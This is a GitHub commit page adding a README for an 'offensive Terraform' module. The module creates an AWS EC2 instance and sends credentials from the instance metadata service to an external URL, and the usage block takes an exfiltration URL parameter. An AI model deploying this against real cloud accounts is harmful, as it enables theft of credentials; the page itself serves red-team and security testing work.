Skip to content

Commit

Permalink
Add README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
iganbold committed Sep 5, 2020
1 parent 78673f5 commit 8fe458a
Showing 1 changed file with 23 additions and 0 deletions.
23 changes: 23 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
# AWS EC2 Instance Credential Exfiltration Module

![OffensiveTerraform](https://img.shields.io/badge/offensive-terraform-purple)

Offensive Terraform module which creates EC2 instance and exfilrate credential from Instance metadata to external URL.

![Attack Diagram](https://github.com/offensive-terraform/terraform-aws-ec2-instance-credential-exfiltration/blob/master/diagram.jpg)

## Usage
```
module "ec2_instance_credential_exfiltration" {
source = "offensive-terraform/terraform-aws-ec2-instance-credential-exfiltration"
subnet_id = "subnet-0a4a1cc04"
url = "http://0.0.0.0/
iam_role= "ec2-instance-role"
iam_instance_profile = "ec2-instance-profile"
}
```
## Author
Module managed by https://github.com/offensive-terraform/


0 comments on commit 8fe458a

Please sign in to comment.